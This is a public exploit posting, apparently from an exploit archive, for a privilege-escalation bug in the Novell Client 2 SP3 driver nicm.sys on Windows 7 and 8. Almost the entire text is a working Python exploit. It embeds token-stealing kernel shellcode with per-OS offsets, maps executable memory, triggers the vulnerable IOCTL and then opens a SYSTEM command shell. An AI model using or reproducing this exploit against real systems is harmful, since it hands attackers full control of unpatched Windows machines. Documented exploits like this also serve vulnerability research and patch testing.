Novell Client 2 SP3 Privilege Escalation Exploit

:
30.07.2013
:
Novell Client 2
:

# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)

# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/

from ctypes import *
import sys,struct,os
from optparse import OptionParser

kernel32 = windll.kernel32
ntdll = windll.ntdll

if __name__ == '__main__':

usage = "%prog -o <target>"
parser = OptionParser(usage=usage)
parser.add_option("-o", type="string",
action="store", dest="target_os",
help="Available target operating systems: WIN7, WIN8")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['WIN7','WIN8']:
parser.print_help()
sys.exit()
OS = OS.upper()

if OS == "WIN7":
_KPROCESS = "\x50" # Offset for Win7
_TOKEN = "\xf8" # Offset for Win7
_UPID = "\xb4" # Offset for Win7
_APLINKS = "\xb8" # Offset for Win7

steal_token = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x08"

sc = steal_token

else:
_KPROCESS = "\x80" # Offset for Win8
_TOKEN = "\xEC" # Offset for Win8
_UPID = "\xB4" # Offset for Win8
_APLINKS = "\xB8" # Offset for Win8

steal_token = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x08"

sc = steal_token


kernel_sc = "\x14\x00\x0d\x0d"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x18\x00\x0d\x0d"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x41\x41\x41\x41"
kernel_sc+= "\x28\x00\x0d\x0d"
kernel_sc+= sc


print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
print "[>] Finding the driver."

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE = '\\\\.\\nicm'

device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
retn = c_ulong()

inut_buffer = 0x0d0d0000
inut_size = 0x14
output_buffer = 0x0
output_size = 0x0

baseadd = c_int(0x0d0d0000)

MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zero_Bits = c_int(0)
RegionSize = c_int(0x1000)
write = c_int(0)

print "[>] Allocating memory for our shellcode."
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
print "[>] Writing the shellcode."
kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))

if device_handler:
print "[>] Sending IOCTL to the driver."
dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)

print "[>] Dropping to a SYSTEM shell."
os.system("cmd.exe /K cd C:\\windows\\system32")

CAPTCHA